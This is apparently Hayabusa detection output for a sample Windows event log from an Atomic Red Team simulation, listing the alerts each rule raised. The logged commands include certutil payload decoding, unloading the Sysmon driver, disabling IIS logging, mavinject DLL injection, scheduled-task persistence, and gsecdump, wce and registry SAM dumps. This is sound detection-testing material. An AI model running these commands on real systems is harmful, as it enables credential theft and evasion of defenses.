+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: certutil.exe -decode file.txt c:\file.exe : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.210 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: 
C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,medium,Suspicious Copy From or To System32,,rules/sigma/process_creation/win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %temp%tcm.tmp -decode c:\file.exe file.txt""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt : Path: C:\Users\IEUser\AppData\Local\Temptcm.tmp : User: MSEDGEWIN10\IEUser : Parent Command: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil 
Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:04.643 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:14.715 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""fltmc.exe unload SysmonDrv"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:14.758 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:14.944 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\System32\inetsrv\appcmd.exe set config "" ""Default /section:httplogging /dontLog:true"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:14.991 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\mavinject.exe"" 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll : Path: C:\Windows\System32\mavinject.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,critical,MavInject Process Injection,,rules/sigma/process_creation/win_mavinject_proc_inj.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:16.496 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c .\bin\T1055.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:16.552 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:44.283 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.073 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management AT : Command: at 13:20 /interactive cmd : Path: C:\Windows\System32\at.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,Interactive AT Job,,rules/sigma/process_creation/win_interactive_at.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.207 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.422 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10 : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.640 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.828 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task 
Management : Command: SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10 : Path: C:\Windows\System32\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:46.927 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:47.218 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:47.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe -a -c : Path: C:\Windows\System32\pcalua.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 
23:57:50.398 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:50.453 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe -a Java : Path: C:\Windows\System32\pcalua.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:52.923 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:52.982 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl : Path: C:\Windows\System32\pcalua.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:53.882 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:54.099 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:54.129 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe : Path: C:\Windows\System32\forfiles.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:55.069 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe : Path: C:\Windows\System32\cmd.exe : User: 
MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:55.138 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe : Path: C:\Windows\System32\forfiles.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:55.236 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:57:58.359 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:09:40.973 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 4516 288 0000023C0CA1FA70 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:09:43.329 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /user : Path: C:\Windows\System32\whoami.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:08.184 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:16.487 
+09:00,MSEDGEWIN10,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:16.986 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""gsecdump -a"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.027 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.107 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""wce -o output.txt"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.149 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.224 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:17.243 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg save HKLM\sam sam : Path: C:\Windows\System32\reg.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 00:11:21.090 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-20 